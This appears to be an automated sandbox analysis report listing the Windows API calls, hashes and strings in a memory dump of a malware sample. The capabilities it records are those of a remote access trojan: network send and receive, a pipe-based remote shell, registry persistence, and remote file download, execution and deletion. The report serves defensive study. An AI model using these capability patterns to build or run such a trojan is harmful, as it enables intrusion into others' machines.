                                                                                                • String ID: SG
                                                                                                • API String ID: 1925916568-3189917014
                                                                                                • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                                                                • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                                                                • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                                                                • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventObjectSingleWaitsend
                                                                                                • String ID:
                                                                                                • API String ID: 3963590051-0
                                                                                                • Opcode ID: 5fd45b4b11434b0c12dc10d8de83455ac21abd31222456cea956a7955e4b4ad4
                                                                                                • Instruction ID: bf343d2d8772227751a31e52b180d9e311d46e55edc4a3b559ef89dc1ff1ac31
                                                                                                • Opcode Fuzzy Hash: 5fd45b4b11434b0c12dc10d8de83455ac21abd31222456cea956a7955e4b4ad4
                                                                                                • Instruction Fuzzy Hash: 202124B2900119BBCB04BBA1DC95DEE777CEF18314B00452FF515B21E2EA78AA15CAA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413518
                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413535
                                                                                                • RegCloseKey.KERNEL32(?), ref: 00413540
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                                                                • Instruction ID: 11ad58ed07fa4a0a265b1ef9ab622cf9d1d79dbf7f3678ccb4777a53df69ef08
                                                                                                • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                                                                • Instruction Fuzzy Hash: FF01D676900228FBCF209B95DC08DEF7F7DDB44B51F000166BB09E2140DA749E45DBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413662
                                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041367B
                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 00413686
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 98426144924e105c68d43f2c638da1a3b8ba285331bfbd987b3b1c2d06b55679
                                                                                                • Instruction ID: 136777831733cc42731b161c89641b3c83b116acaaa4d3a405525fee88e85c23
                                                                                                • Opcode Fuzzy Hash: 98426144924e105c68d43f2c638da1a3b8ba285331bfbd987b3b1c2d06b55679
                                                                                                • Instruction Fuzzy Hash: A4014B31900229FBCF219F91DC05DEB7F39EF05761F0041A5BE0862261D6358AA9DBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F322
                                                                                                • _free.LIBCMT ref: 0044F35B
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F362
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnvironmentStrings$Free_free
                                                                                                • String ID:
                                                                                                • API String ID: 2716640707-0
                                                                                                • Opcode ID: 9ec1d961cb14f12f91aacdaf6413dd81fe3ec32b96427f978c5212ff75952165
                                                                                                • Instruction ID: a1d6b4a1e64e919a94679e00097536c2a03edaddbe57f8c032bdc4099cd812e0
                                                                                                • Opcode Fuzzy Hash: 9ec1d961cb14f12f91aacdaf6413dd81fe3ec32b96427f978c5212ff75952165
                                                                                                • Instruction Fuzzy Hash: 86E06537105A216BB221663A7C49D6B2A19DFC67A972A003BF90486142DE29CD0640ED
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004134B7
                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004134D5
                                                                                                • RegCloseKey.KERNEL32(?), ref: 004134E0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                • Instruction ID: e794e59b5ca6a57b749d61e58330535b6f90d7e0fac61ab044fd0cc5ac3c4881
                                                                                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                • Instruction Fuzzy Hash: 13F0F976900218FFDF119FA49D05BEA7BBCEB04B11F1040A6BE08E6191D2359A549B94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C0EA,00466C48), ref: 00413464
                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C0EA,00466C48), ref: 00413478
                                                                                                • RegCloseKey.KERNEL32(?,?,?,0040C0EA,00466C48), ref: 00413483
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                • Instruction ID: e49fa1678814d70b7460577f8c92d0bb3d1ec56b87fc076ee76b734fba8ab665
                                                                                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                • Instruction Fuzzy Hash: 83E06531801338FB9F208FA29C0DEEB7F6CDF0ABA5B004155BD0CA1111D2258E50E6E4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 004137D3
                                                                                                • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C0A0,00466C48,00000001,000000AF,004660A4), ref: 004137EE
                                                                                                • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C0A0,00466C48,00000001,000000AF,004660A4), ref: 004137F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID:
                                                                                                • API String ID: 1818849710-0
                                                                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                • Instruction ID: ead8b78bb389cf5df025ceee4aae861e94320b11b9276a5e3b9bfc9d6c17330c
                                                                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                • Instruction Fuzzy Hash: 69E06572500318FBDF105F90DC05FEA7F6CDF04B52F104465BF09A6191D2358E14A7A4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                • recv.WS2_32(?,?,?,00000000), ref: 00404BDA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventObjectSingleWaitrecv
                                                                                                • String ID:
                                                                                                • API String ID: 311754179-0
                                                                                                • Opcode ID: 892a44a7d3238735dc6a48834f3a0d54c5d7f95f760ba03120f4e8939475261b
                                                                                                • Instruction ID: 696cc5fcca0fef600b7ec92c1ce6b898062c6d35d7bca60e035961dc641c3578
                                                                                                • Opcode Fuzzy Hash: 892a44a7d3238735dc6a48834f3a0d54c5d7f95f760ba03120f4e8939475261b
                                                                                                • Instruction Fuzzy Hash: CAF08236108213FFC7059F10EC09E4AFBA2FF84721F10862AF510522A18771FC20DB65
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _wcslen
                                                                                                • String ID: pQG
                                                                                                • API String ID: 176396367-3769108836
                                                                                                • Opcode ID: ce79a04ebf4fd5ad33c8929c428e8b75ef0dd90ae827798176b0cff7311ba38e
                                                                                                • Instruction ID: 95d278e3f05488c0820dd2c8153ac27ae1675786c683aeaf702fa7e1242427c2
                                                                                                • Opcode Fuzzy Hash: ce79a04ebf4fd5ad33c8929c428e8b75ef0dd90ae827798176b0cff7311ba38e
                                                                                                • Instruction Fuzzy Hash: 6C11C6319002059BCB15EF65E8519EF77B4EF54318B10413FF805A62E2EF789D05CB98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B718
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: GlobalMemoryStatus
                                                                                                • String ID: @
                                                                                                • API String ID: 1890195054-2766056989
                                                                                                • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                                                • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
                                                                                                  • Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
                                                                                                  • Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
                                                                                                  • Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153
                                                                                                  • Part of subcall function 0044EF37: _abort.LIBCMT ref: 0044EF69
                                                                                                  • Part of subcall function 0044EF37: _free.LIBCMT ref: 0044EF9D
                                                                                                  • Part of subcall function 0044EBAC: GetOEMCP.KERNEL32(00000000,?,?,0044EE35,?), ref: 0044EBD7
                                                                                                • _free.LIBCMT ref: 0044EE90
                                                                                                • _free.LIBCMT ref: 0044EEC6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast_abort
                                                                                                • String ID:
                                                                                                • API String ID: 2991157371-0
                                                                                                • Opcode ID: d4f12453d6797030d5dc3602a21d42d574daa5b640ebd775749f27024f3c7875
                                                                                                • Instruction ID: afb2a9087478ec41e314e0473c94043602b5b99840e25ac3086ca26a5d64e734
                                                                                                • Opcode Fuzzy Hash: d4f12453d6797030d5dc3602a21d42d574daa5b640ebd775749f27024f3c7875
                                                                                                • Instruction Fuzzy Hash: 3F31B331904208AFEB10EBABD441BAA77E4FF40364F35409FE9049B2A1EB399D41CB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEventStartupsocket
                                                                                                • String ID:
                                                                                                • API String ID: 1953588214-0
                                                                                                • Opcode ID: 521f5ece035b781d6614b92269cfb6f5cbcb1df57b0ec94ab883829d9db72848
                                                                                                • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                                                                                • Opcode Fuzzy Hash: 521f5ece035b781d6614b92269cfb6f5cbcb1df57b0ec94ab883829d9db72848
                                                                                                • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 46b585aab576b37ad3e48a0b6346da99b96b327e84507ec42d72745901d9332c
                                                                                                • Instruction ID: 3e8f64bc5ed55066a36edb92307bbee41a7a19d03423297ea4ea0071b53a58e7
                                                                                                • Opcode Fuzzy Hash: 46b585aab576b37ad3e48a0b6346da99b96b327e84507ec42d72745901d9332c
                                                                                                • Instruction Fuzzy Hash: A9E0EC9260551021F571363F6C0A75B05499B8177FF12833BF424861C0CFAC4946419E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ForegroundText
                                                                                                • String ID:
                                                                                                • API String ID: 29597999-0
                                                                                                • Opcode ID: 37bc9f448460fd1a8cd65ff34a710c4e1c0024134306fb5edc35e71c98be8f28
                                                                                                • Instruction ID: 637cd5112d301657ed660dbb1bed4a0c67cc53091dd33397c2e6fc7b47bdc960
                                                                                                • Opcode Fuzzy Hash: 37bc9f448460fd1a8cd65ff34a710c4e1c0024134306fb5edc35e71c98be8f28
                                                                                                • Instruction Fuzzy Hash: 75E0D871A00328A7E720A7A4AC4EFE5776CEB08711F0000EABA18D31C2EAB49D04C7E4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetUserNameW.ADVAPI32(?,0040F171), ref: 0041B590
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: NameUser
                                                                                                • String ID:
                                                                                                • API String ID: 2645101109-0
                                                                                                • Opcode ID: 9167295f8432bcd57fb576626eea4e25c386a7a518f3d3aa5e9611e2b6c4d6a9
                                                                                                • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                                                                • Opcode Fuzzy Hash: 9167295f8432bcd57fb576626eea4e25c386a7a518f3d3aa5e9611e2b6c4d6a9
                                                                                                • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044818A,00000001,00000364,?,00000000,00000000,0043BBC7,00000000,00000000,?,0043BC4B,00000000), ref: 00445A74
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                                                                                • Instruction ID: bdb0e33e5721535a497c71cc9b1cca338f3da8d9e5fc8602029d377f2be5a4ff
                                                                                                • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                                                                                • Instruction Fuzzy Hash: 2AF0B432500D246BBF219A629C81B5B3749AB417A0B188327E809BA282CA78D80146BC
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                                                • Instruction ID: fc72969beeef8e46adb3e5c897d71457bd534b1de3a68609239d713461f06929
                                                                                                • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                                                • Instruction Fuzzy Hash: ADE0E53110061566FA31BAA69C04B5B368D8B037A5F164123EC0596281DA6CCC0041AF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Startup
                                                                                                • String ID:
                                                                                                • API String ID: 724789610-0
                                                                                                • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                                                • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                                                                                • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                                                • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Deallocatestd::_
                                                                                                • String ID:
                                                                                                • API String ID: 1323251999-0
                                                                                                • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                                • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                                                                  • Part of subcall function 0041C1DF: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C23A
                                                                                                  • Part of subcall function 0041C1DF: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C26A
                                                                                                  • Part of subcall function 0041C1DF: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2BF
                                                                                                  • Part of subcall function 0041C1DF: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C320
                                                                                                  • Part of subcall function 0041C1DF: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C327
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  • Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457
                                                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                                                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                                                                • DeleteFileA.KERNEL32(?), ref: 00408652
                                                                                                  • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                                                                  • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                                                  • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                                                  • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                                                • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                                                                                  • Part of subcall function 0041C930: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CA25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                                • API String ID: 1067849700-181434739
                                                                                                • Opcode ID: 1bf8eb397982a158c97228fc9dc483f16833d24416ade9af270beac70ea58c75
                                                                                                • Instruction ID: 90b1a348b1d799a82cead3257c211a36afb2c35d21ecd37c7c023c3bbace4ffa
                                                                                                • Opcode Fuzzy Hash: 1bf8eb397982a158c97228fc9dc483f16833d24416ade9af270beac70ea58c75
                                                                                                • Instruction Fuzzy Hash: 8C428171A043016BC604FB76C9579AF77A5AF91348F80093FF542671E2EE7C9A08879B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                • CreatePipe.KERNEL32(00476CBC,00476CA4,00476BC8,00000000,004660BC,00000000), ref: 004057B6
                                                                                                • CreatePipe.KERNEL32(00476CA8,00476CC4,00476BC8,00000000), ref: 004057CC
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BD8,00476CAC), ref: 0040583F
                                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                  • Part of subcall function 004346BE: __onexit.LIBCMT ref: 004346C4
                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                                                                                • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
